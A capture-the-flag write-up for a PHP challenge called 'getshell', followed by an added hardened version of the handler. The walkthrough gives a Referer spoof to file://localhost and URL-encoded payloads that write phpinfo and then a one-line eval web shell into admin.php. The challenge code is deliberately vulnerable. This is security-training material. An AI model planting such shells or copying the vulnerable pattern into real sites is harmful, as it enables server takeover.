Web: getshell
The challenge code is as follows:
```php
<?php
highlight_file(__FILE__);
error_reporting(0);
echo "<h1>WELCOME 23333333333</h1>" . "\n";

// the admin check relies entirely on the client-supplied Referer header
$url = $_SERVER["HTTP_REFERER"];
$r = parse_url($url);
if (!empty($r['host']) && $r['host'] === 'localhost' && $r['scheme'] === 'file') {
    echo "yeah u are admin" . "<br>";
} else {
    die('u are not admin' . "<br>");
}

//only admin can do it
$content = addslashes($_GET['content']);
echo 'now_you_are_admin' . "<br>";
if (!file_exists("admin.php")) {
    file_put_contents('admin.php', "secret = 'xxx'");
    //change the content
    if ($content) {
        // user input is substituted straight into a .php file
        $file = file_get_contents("./admin.php");
        $file = preg_replace("/secret = '.*'/", "secret = '{$content}'", $file);
        file_put_contents('./admin.php', $file);
    }
}
if (isset($_GET['reset'])) {
    @exec('/bin/rm -rf admin.php');
}
?>
```
- Auditing the code shows that the check requires the file:// pseudo-protocol; setting the Referer to file://localhost is enough to become admin.
- The next step of the audit shows that data must be written, and the file written is PHP, so we use ?content=urldecode(%3C%3Fphp%20phpinfo()%3B%3F%3E)
- We then write a one-line shell with /?content=urldecode(<%3Fphp %40eval(%24_POST[123])%3F>) and connect with 蚁剑 (AntSword).
Finally, the flag is found in the / directory.
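For contrast, here is an added hardened version of the same handler (my own code, not part of the original challenge or write-up). It drops the Referer-based admin check in favour of a server-side session flag, allow-lists `content` instead of relying on addslashes(), and stores the secret with var_export() in a file outside the web root so the value can never be parsed as code. The session key `is_admin` and the config path are assumptions.

```php
<?php
// Hardened variant of the challenge handler (added example).
// Assumption: a real login sets $_SESSION['is_admin']; the Referer header is
// client-controlled and is not consulted at all.
session_start();

if (empty($_SESSION['is_admin'])) {
    http_response_code(403);
    die('u are not admin');
}

// Assumed location outside the web root, so the file is never served or executed.
$configPath = __DIR__ . '/../config/admin_secret.php';

// addslashes() only escapes quotes; it does not stop "<?php" or "?>" from being
// written into a .php file. A tight character class does.
$content = $_GET['content'] ?? '';
if ($content !== '' && !preg_match('/^[A-Za-z0-9_\-]{1,64}$/', $content)) {
    http_response_code(400);
    die('invalid secret');
}

if ($content !== '') {
    // var_export() emits a properly escaped PHP string literal, so the value is
    // data inside the config file rather than template text spliced by regex.
    $php = "<?php\nreturn ['secret' => " . var_export($content, true) . "];\n";
    file_put_contents($configPath, $php, LOCK_EX);
}

if (isset($_GET['reset'])) {
    // Use the PHP filesystem API instead of shelling out to rm.
    if (is_file($configPath)) {
        unlink($configPath);
    }
}
```

The stored secret is read back with `require $configPath;`, which returns the array without ever evaluating user input as code.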
Source: https://www.cnblogs.com/wushiyiwuzhong/p/16607349.html